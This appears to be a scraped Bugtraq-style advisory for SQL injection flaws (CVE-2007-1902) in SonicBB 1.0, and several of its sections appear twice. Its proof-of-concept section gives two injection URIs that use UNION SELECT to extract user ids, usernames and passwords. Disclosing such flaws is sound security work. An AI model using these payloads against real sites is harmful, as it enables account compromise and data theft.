SonicBB Multiple SQL Injection Vulnerabilities
BID:23964
Info
SonicBB Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 23964 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-1902 |
| Remote: | Yes |
| Local: | No |
| Published: | May 14 2007 12:00AM |
| Updated: | May 15 2007 05:48PM |
| Credit: | Jesper Jurcenoks of netVigilance, Inc is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
SonicBB SonicBB 1.0 |
| Not Vulnerable: | |
Discussion
SonicBB Multiple SQL Injection Vulnerabilities
SonicBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SonicBB 1.0 is vulnerable; other versions may also be affected.
SonicBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SonicBB 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
SonicBB Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/path/search.php?query=1&part=post`<> '' UNIoN SELECT `id`,`password`,1,1,1,1,`username` FROM `users` WHERE id=1/*&by=*/
http://www.example.com/path/viewforum.php?id=1' UNION SELECT `id`,`password`,1,1,1,1,1 FROM `users` WHERE id=1%23
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/path/search.php?query=1&part=post`<> '' UNIoN SELECT `id`,`password`,1,1,1,1,`username` FROM `users` WHERE id=1/*&by=*/
http://www.example.com/path/viewforum.php?id=1' UNION SELECT `id`,`password`,1,1,1,1,1 FROM `users` WHERE id=1%23
Solution / Fix
SonicBB Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
SonicBB Multiple SQL Injection Vulnerabilities
References:
References: